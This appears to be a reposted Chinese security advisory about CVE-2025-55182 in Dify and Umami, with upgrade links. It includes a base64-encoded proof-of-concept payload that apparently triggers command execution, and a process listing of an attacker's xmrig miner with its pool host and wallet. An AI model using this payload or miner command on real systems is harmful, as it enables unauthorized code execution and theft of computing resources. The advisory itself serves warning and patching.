文章总结: CVE-2025-55182漏洞影响Dify和Umami两个应用,公网已出现挖矿攻击。文档提供了验证POC和攻击示例,显示攻击者利用该漏洞部署了xmrig挖矿程序。建议用户立即升级到最新版本:Dify升级到1.10.1-fix.1版本,Umami升级到v3.0.2版本以修复该漏洞。
综合评分: 78
文章分类: 漏洞分析,漏洞预警,应急响应,威胁情报,WEB安全
CVE-2025-55182,Dify+Umami需紧急防护
甲方叫我安服仔
2025年12月5日 15:50
浙江
1、app.name=”Umami”
2、app.name=”Dify”
以上两个应用均受影响,建议升级到最新版。
验证POC:
ZXlKMGFHVnVJam9pSkRFNlgxOXdjbTkwYjE5Zk9uUm9aVzRpTENKemRHRjBkWE1pT2lKeVpYTnZiSFpsWkY5dGIyUmxiQ0lzSW5Uk2TFRFc0luWmhiSFZsSWpvaWUxd2lkR2hsYmx3aU9sd2lKRUl4TXpNM1hDSjlJaXdpWDNKbGMzQnZibk5sSsOXdjbVZtYVhnaU921WelBYQnliMk5sYzNNdWJXRnBiazF2YVhKbEtDZGphR2xzWkY5d2NtOWpaWE5MU41Ym1Nb0oyeHpKeWt1ZEc5VGRISnBibWNvS1M1MGs3ZEdoeWIzY2dUMkpxWldOMExtRnpjMmxuYmlodVpYY2dSWEp5YjNJb0tTeDd9pQnlaWE45S1RzagxYm10eklqb2lKRkV5SWl3aVgyWnZjbThSacDdJbWRsZENJNklpUXhPbU52Ym5OMGNuVmpkRzl5T21OdmJuTjBjblZqZEc5eUluMTlmUQ==
公网已有挖矿攻击
root 2380791 30.613.5 312304272324 ? Tsl 06:051:27 /root/umami/xmrig-6.24.0/xmrig --url pool.hashvault.pro:443 --user 8BWy7pgane96sLATF7nESM4ehZEtYAFNpYFAm88zftVsJ5jxFBdGVBrd1igptedXejfomPEpJvGUKU1etmkNBXmU5HkPR6e --pass ZimbabveDC --donate-level 0 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
升级建议:
Dify升级包:
https://github.com/langgenius/dify/releases/tag/1.10.1-fix.1
Umami升级包:
https://github.com/umami-software/umami/releases/tag/v3.0.2
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:甲方叫我安服仔 《CVE-2025-55182,Dify+Umami需紧急防护》